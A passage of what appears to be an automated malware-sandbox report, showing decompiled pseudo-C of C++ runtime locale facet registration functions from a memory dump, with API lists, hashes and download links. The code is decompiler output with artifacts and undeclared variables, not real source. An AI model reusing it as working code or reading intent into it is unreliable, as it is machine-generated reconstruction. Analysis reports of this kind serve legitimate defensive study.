																																		_t524 =  *((intOrPtr*)(_t638 + 8));
																																		_t604 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t339);
																																		__eflags = _t604;
																																		if(_t604 != 0) {
																																			L75:
																																			E6DDD66BA(_t638 - 0x14);
																																			return E6DDF0075(_t604);
																																		} else {
																																			__eflags = _t619;
																																			if(_t619 == 0) {
																																				_push( *((intOrPtr*)(_t638 + 8)));
																																				_push(_t638 - 0x10);
																																				__eflags = E6DDE14EC(_t451, _t524, _t592, _t604, _t619) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t638 - 0x20);
																																					E6DDF3D74(_t638 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t451, _t604, _t619, 0x14);
																																					E6DDD6653(_t638 - 0x14, 0);
																																					_t620 =  *0x6de96dcc; // 0x0
																																					 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																					 *(_t638 - 0x10) = _t620;
																																					_t352 = E6DDB161C(0x6de96d80);
																																					_t531 =  *((intOrPtr*)(_t638 + 8));
																																					_t605 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t352);
																																					__eflags = _t605;
																																					if(_t605 != 0) {
																																						L82:
																																						E6DDD66BA(_t638 - 0x14);
																																						return E6DDF0075(_t605);
																																					} else {
																																						__eflags = _t620;
																																						if(_t620 == 0) {
																																							_push( *((intOrPtr*)(_t638 + 8)));
																																							_push(_t638 - 0x10);
																																							__eflags = E6DDE1558(_t451, _t531, _t592, _t605, _t620) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t638 - 0x20);
																																								E6DDF3D74(_t638 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t451, _t605, _t620, 0x14);
																																								E6DDD6653(_t638 - 0x14, 0);
																																								_t621 =  *0x6de96e00; // 0x0
																																								 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																								 *(_t638 - 0x10) = _t621;
																																								_t365 = E6DDB161C(0x6de96dac);
																																								_t538 =  *((intOrPtr*)(_t638 + 8));
																																								_t606 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t365);
																																								__eflags = _t606;
																																								if(_t606 != 0) {
																																									L89:
																																									E6DDD66BA(_t638 - 0x14);
																																									return E6DDF0075(_t606);
																																								} else {
																																									__eflags = _t621;
																																									if(_t621 == 0) {
																																										_push( *((intOrPtr*)(_t638 + 8)));
																																										_push(_t638 - 0x10);
																																										__eflags = E6DDE15C4(_t451, _t538, _t592, _t606, _t621) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t638 - 0x20);
																																											E6DDF3D74(_t638 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t451, _t606, _t621, 0x14);
																																											E6DDD6653(_t638 - 0x14, 0);
																																											_t622 =  *0x6de96dd0; // 0x0
																																											 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																											 *(_t638 - 0x10) = _t622;
																																											_t378 = E6DDB161C(0x6de96d60);
																																											_t545 =  *((intOrPtr*)(_t638 + 8));
																																											_t607 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t378);
																																											__eflags = _t607;
																																											if(_t607 != 0) {
																																												L96:
																																												E6DDD66BA(_t638 - 0x14);
																																												return E6DDF0075(_t607);
																																											} else {
																																												__eflags = _t622;
																																												if(_t622 == 0) {
																																													_push( *((intOrPtr*)(_t638 + 8)));
																																													_push(_t638 - 0x10);
																																													__eflags = E6DDE162A(_t451, _t545, _t592, _t607, _t622) - 0xffffffff;
																																													if(__eflags == 0) {
																																														_t549 = _t638 - 0x20;
																																														E6DDB1438(_t549);
																																														E6DDF3D74(_t638 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de3851f, _t451, _t607, _t622, 4);
																																														_t623 = _t549;
																																														 *(_t638 - 0x10) = _t623;
																																														 *((intOrPtr*)(_t623 + 4)) =  *((intOrPtr*)(_t638 + 0xc));
																																														_push( *((intOrPtr*)(_t638 + 0x14)));
																																														_t203 = _t638 - 4;
																																														 *_t203 =  *(_t638 - 4) & 0x00000000;
																																														__eflags =  *_t203;
																																														 *_t623 = 0x6de3c0c4;
																																														 *((char*)(_t623 + 0x28)) =  *((intOrPtr*)(_t638 + 0x10));
																																														E6DDE542F(_t451, _t549, _t592, _t607, _t623,  *_t203);
																																														return E6DDF0075(_t623,  *((intOrPtr*)(_t638 + 8)));
																																													} else {
																																														_t607 =  *(_t638 - 0x10);
																																														 *(_t638 - 0x10) = _t607;
																																														 *(_t638 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t607);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t607 + 4))))();
																																														 *0x6de96dd0 = _t607;
																																														goto L96;
																																													}
																																												} else {
																																													_t607 = _t622;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t606 =  *(_t638 - 0x10);
																																											 *(_t638 - 0x10) = _t606;
																																											 *(_t638 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t606);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t606 + 4))))();
																																											 *0x6de96e00 = _t606;
																																											goto L89;
																																										}
																																									} else {
																																										_t606 = _t621;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t605 =  *(_t638 - 0x10);
																																								 *(_t638 - 0x10) = _t605;
																																								 *(_t638 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t605);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t605 + 4))))();
																																								 *0x6de96dcc = _t605;
																																								goto L82;
																																							}
																																						} else {
																																							_t605 = _t620;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t604 =  *(_t638 - 0x10);
																																					 *(_t638 - 0x10) = _t604;
																																					 *(_t638 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t604);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t604 + 4))))();
																																					 *0x6de96dfc = _t604;
																																					goto L75;
																																				}
																																			} else {
																																				_t604 = _t619;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t603 =  *(_t638 - 0x10);
																																		 *(_t638 - 0x10) = _t603;
																																		 *(_t638 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t603);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t603 + 4))))();
																																		 *0x6de96de0 = _t603;
																																		goto L68;
																																	}
																																} else {
																																	_t603 = _t618;
																																	goto L68;
																																}
																															}
																														} else {
																															_t602 =  *(_t638 - 0x10);
																															 *(_t638 - 0x10) = _t602;
																															 *(_t638 - 4) = 1;
																															E6DDD6FD3(__eflags, _t602);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t602 + 4))))();
																															 *0x6de96ddc = _t602;
																															goto L61;
																														}
																													} else {
																														_t602 = _t617;
																														goto L61;
																													}
																												}
																											} else {
																												_t601 =  *(_t638 - 0x10);
																												 *(_t638 - 0x10) = _t601;
																												 *(_t638 - 4) = 1;
																												E6DDD6FD3(__eflags, _t601);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t601 + 4))))();
																												 *0x6de96db0 = _t601;
																												goto L54;
																											}
																										} else {
																											_t601 = _t616;
																											goto L54;
																										}
																									}
																								} else {
																									_t600 =  *(_t638 - 0x10);
																									 *(_t638 - 0x10) = _t600;
																									 *(_t638 - 4) = 1;
																									E6DDD6FD3(__eflags, _t600);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t600 + 4))))();
																									 *0x6de96dd8 = _t600;
																									goto L47;
																								}
																							} else {
																								_t600 = _t615;
																								goto L47;
																							}
																						}
																					} else {
																						_t599 =  *(_t638 - 0x10);
																						 *(_t638 - 0x10) = _t599;
																						 *(_t638 - 4) = 1;
																						E6DDD6FD3(__eflags, _t599);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t599 + 4))))();
																						 *0x6de96dc4 = _t599;
																						goto L40;
																					}
																				} else {
																					_t599 = _t614;
																					goto L40;
																				}
																			}
																		} else {
																			_t598 =  *(_t638 - 0x10);
																			 *(_t638 - 0x10) = _t598;
																			 *(_t638 - 4) = 1;
																			E6DDD6FD3(__eflags, _t598);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t598 + 4))))();
																			 *0x6de96dc8 = _t598;
																			goto L33;
																		}
																	} else {
																		_t598 = _t613;
																		goto L33;
																	}
																}
															} else {
																_t597 =  *(_t638 - 0x10);
																 *(_t638 - 0x10) = _t597;
																 *(_t638 - 4) = 1;
																E6DDD6FD3(__eflags, _t597);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t597 + 4))))();
																 *0x6de96df4 = _t597;
																goto L26;
															}
														} else {
															_t597 = _t612;
															goto L26;
														}
													}
												} else {
													_t596 =  *(_t638 - 0x10);
													 *(_t638 - 0x10) = _t596;
													 *(_t638 - 4) = 1;
													E6DDD6FD3(__eflags, _t596);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t596 + 4))))();
													 *0x6de96df8 = _t596;
													goto L19;
												}
											} else {
												_t596 = _t611;
												goto L19;
											}
										}
									} else {
										_t595 =  *(_t638 - 0x10);
										 *(_t638 - 0x10) = _t595;
										 *(_t638 - 4) = 1;
										E6DDD6FD3(__eflags, _t595);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t595 + 4))))();
										 *0x6de96dc0 = _t595;
										goto L12;
									}
								} else {
									_t595 = _t610;
									goto L12;
								}
							}
						} else {
							_t594 =  *(_t638 - 0x10);
							 *(_t638 - 0x10) = _t594;
							 *(_t638 - 4) = 1;
							E6DDD6FD3(__eflags, _t594);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t594 + 4))))();
							 *0x6de96df0 = _t594;
							goto L5;
						}
					} else {
						_t594 = _t609;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF422
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF42C
int.LIBCPMT ref: 6DDDF443

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF4BB

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 182489b249fe5c564a567d8061c37cff6646487a21f907bfab3cdc006d3c09fc
Instruction ID: 373a08f35aae25ac05fb9cab24362190690f31eb4c8c08d96c165a004f03a9ef
Opcode Fuzzy Hash: 182489b249fe5c564a567d8061c37cff6646487a21f907bfab3cdc006d3c09fc
Instruction Fuzzy Hash: B4110272909119DBCF01FB60C850AFDB779BF84318F260009F621AB290DF7099018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF7FF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF7FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t374 - 0x14, 0);
				_t357 =  *0x6de96dd8; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6DDB161C(0x6de96d84);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6DDD66BA(_t374 - 0x14);
					return E6DDF0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6DDE1339(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t374 - 0x20);
							E6DDF3D74(_t374 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t348, _t357, 0x14);
							E6DDD6653(_t374 - 0x14, 0);
							_t358 =  *0x6de96db0; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6DDB161C(0x6de96d64);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6DDD66BA(_t374 - 0x14);
								return E6DDF0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6DDE13A1(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t374 - 0x20);
										E6DDF3D74(_t374 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t265, _t349, _t358, 0x14);
										E6DDD6653(_t374 - 0x14, 0);
										_t359 =  *0x6de96ddc; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6DDB161C(0x6de96d88);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6DDD66BA(_t374 - 0x14);
											return E6DDF0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6DDE1409(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t374 - 0x20);
													E6DDF3D74(_t374 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t265, _t350, _t359, 0x14);
													E6DDD6653(_t374 - 0x14, 0);
													_t360 =  *0x6de96de0; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6DDB161C(0x6de96d8c);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6DDD66BA(_t374 - 0x14);
														return E6DDF0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6DDE1471(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t374 - 0x20);
																E6DDF3D74(_t374 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t265, _t351, _t360, 0x14);
																E6DDD6653(_t374 - 0x14, 0);
																_t361 =  *0x6de96dfc; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6DDB161C(0x6de96da8);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6DDD66BA(_t374 - 0x14);
																	return E6DDF0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6DDE14EC(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t374 - 0x20);
																			E6DDF3D74(_t374 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t265, _t352, _t361, 0x14);
																			E6DDD6653(_t374 - 0x14, 0);
																			_t362 =  *0x6de96dcc; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6DDB161C(0x6de96d80);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6DDD66BA(_t374 - 0x14);
																				return E6DDF0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6DDE1558(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t374 - 0x20);
																						E6DDF3D74(_t374 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t265, _t353, _t362, 0x14);
																						E6DDD6653(_t374 - 0x14, 0);
																						_t363 =  *0x6de96e00; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6DDB161C(0x6de96dac);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6DDD66BA(_t374 - 0x14);
																							return E6DDF0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6DDE15C4(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t374 - 0x20);
																									E6DDF3D74(_t374 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t265, _t354, _t363, 0x14);
																									E6DDD6653(_t374 - 0x14, 0);
																									_t364 =  *0x6de96dd0; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6DDB161C(0x6de96d60);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6DDD66BA(_t374 - 0x14);
																										return E6DDF0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6DDE162A(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6DDB1438(_t321);
																												E6DDF3D74(_t374 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de3851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6de3c0c4;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6DDE542F(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6DDF0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6DDD6FD3(__eflags, _t355);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6de96dd0 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6DDD6FD3(__eflags, _t354);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6de96e00 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6DDD6FD3(__eflags, _t353);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6de96dcc = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6DDD6FD3(__eflags, _t352);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6de96dfc = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6DDD6FD3(__eflags, _t351);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6de96de0 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6DDD6FD3(__eflags, _t350);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6de96ddc = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6DDD6FD3(__eflags, _t349);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6de96db0 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6DDD6FD3(__eflags, _t348);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6de96dd8 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF806
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF810
int.LIBCPMT ref: 6DDDF827

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF861
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF881
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF89F

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 94c14ca8e652a076e7fb8e08818092dcdc2a170ad2daafdd03954d91af0e7b46
Instruction ID: dff0bfb73086c13a237b9bc4e56fdf795f002a7c8c7845eb5fcb98381e57db69
Opcode Fuzzy Hash: 94c14ca8e652a076e7fb8e08818092dcdc2a170ad2daafdd03954d91af0e7b46
Instruction Fuzzy Hash: D411C6B5948229DBCF05FBA4C850BFDB775AF84718F260009F511AB290DF749A0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4747, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDD4747(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t39;
				intOrPtr* _t44;
				void* _t47;

				E6DDF00AC(0x6de3816f, __ebx, __edi, __esi, 0x18);
				E6DDD6653(_t47 - 0x14, 0);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t44 =  *0x6deace7c; // 0xb99390
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				_t18 = E6DDB161C(0x6deace90);
				_t35 =  *((intOrPtr*)(_t47 + 8));
				_t19 = E6DDB171B( *((intOrPtr*)(_t47 + 8)), _t18);
				_t46 = _t19;
				if(_t19 != 0) {
					L5:
					E6DDD66BA(_t47 - 0x14);
					return E6DDF0075(_t46);
				} else {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t47 + 8)));
						_push(_t47 - 0x10);
						__eflags = E6DDD4F5F(__ebx, _t35, __edx, _t44, _t46) - 0xffffffff;
						if(__eflags == 0) {
							_t39 = _t47 - 0x20;
							E6DDB1438(_t39);
							E6DDF3D74(_t47 - 0x20, 0x6de93504);
							asm("int3");
							 *_t39 = __edx;
							return _t39;
						} else {
							_t46 =  *((intOrPtr*)(_t47 - 0x10));
							 *((intOrPtr*)(_t47 - 0x10)) = _t46;
							 *(_t47 - 4) = 1;
							E6DDD6FD3(__eflags, _t46);
							 *((intOrPtr*)( *_t46 + 4))();
							 *0x6deace7c = _t46;
							goto L5;
						}
					} else {
						_t46 = _t44;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDD474E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD4758
int.LIBCPMT ref: 6DDD476F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD47A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD47BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD47DD

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: cbacb16295887515dba291691c58b817e525f46cb4aadf95e2d800a8ced1445a
Instruction ID: 1e2797d6dbd80bd2eac1d0e440e52822f1eeb63d8aaf8b2f30b32cf3bd89e7fa
Opcode Fuzzy Hash: cbacb16295887515dba291691c58b817e525f46cb4aadf95e2d800a8ced1445a
Instruction Fuzzy Hash: F6110275908129DBCF00FBA4C840AFEB7B4AF49318F268508F515AB291DF709E05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA1A5, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DDDA1A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v32;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;

				_t99 = __ebx;
